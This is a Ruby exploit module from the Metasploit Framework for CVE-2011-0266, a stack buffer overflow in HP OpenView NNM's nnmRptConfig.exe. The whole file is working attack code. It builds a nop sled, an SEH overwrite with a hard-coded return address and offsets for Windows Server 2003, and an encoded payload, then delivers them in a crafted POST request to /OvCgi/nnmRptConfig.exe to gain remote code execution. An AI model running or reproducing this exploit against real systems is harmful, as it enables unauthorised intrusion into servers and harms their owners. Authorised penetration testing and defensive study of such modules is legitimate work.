##
# $Id: hp_nnm_nnmrptconfig_nameparams.rb 12085 2011-03-23 03:37:18Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::Remote::Seh

 def initialize(info={})
  super(update_info(info,
   'Name'        => "HP OpenView NNM nnmRptConfig nameParams Buffer Overflow",
   'Description' => %q{
    This module exploits a vulnerability in HP NNM's nnmRptConfig.exe.
    A remote user can send a long string data to the nameParams parameter via
    a POST request, which causes an overflow on the stack when function
    ov.sprintf_new() is used, and gain arbitrary code execution.'
   },
   'License'   => MSF_LICENSE,
   'Version'   => "$Revision: 12085 $",
   'Author'      =>
    [
     'sinn3r',
    ],
   'References' =>
    [
     ['CVE', '2011-0266'],
     ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-008/']
    ],
   'Payload'  =>
    {
     'BadChars' => "\x00\x26\x2b",
    },
   'DefaultOptions' =>
    {
     'ExitFunction' => "seh",
     'AutoRunScript' => 'migrate -f',
    },
   'Platform' => 'win',
   'Targets'  =>
    [
     ['Windows Server 2003 Enterprise', {'Ret'=>0x5A30532D, 'offset'=>46913, 'Pops'=>13, 'Payloadoffset'=>57} ],
    ],
   'Privileged'     => false,
   'DisclosureDate' => "JAN 10 2011"))

   register_options(
    [
     Opt::RPORT(80),
    ], self.class)
 end

 def exploit

  nops = make_nops(1000)*70

  sploit  = nops[0, target['offset']]
  sploit << generate_seh_record(target.ret)
  sploit << "\x61"*target['Pops']
  sploit << "\x51"
  sploit << "\xc3"
  sploit << nops[0, target['Payloadoffset']]
  sploit << payload.encoded
  sploit << nops[0, 70000-sploit.length]

  data  = "Content&Action=Create&"
  data << "Template=Avail/CRAvail&"
  data << "Operation=Apply&"
  data << "Params=schdParams+nameParams"
  data << "&schdParams=schd_select1%3Ddaily%7Cmonthtodate&"
  data << "nameParams=text1%3D#{sploit}%26text2%3Dtest2test%26text3%3Dtest2 HTTP/1.1"

  connect
  send_request_raw({
   'uri' => '/OvCgi/nnmRptConfig.exe',
   'data' => data,
   'version' => '1.1',
   'method' => 'POST',
   'headers' => {
    'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language' => 'en-us,en;q=0.5',
    'Accept-Encoding' => 'gzip,deflate',
    'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
    'Keep-Alive' => '300',
    'Connection' => 'Keep-Alive',
    'Cache-Control' => 'max-age=0',
    'Content-Length' => data.length,
    'Content-Type' => 'application/x-www-form-urlencoded',
   }
  }, 3)

  handler
  disconnect

 end
end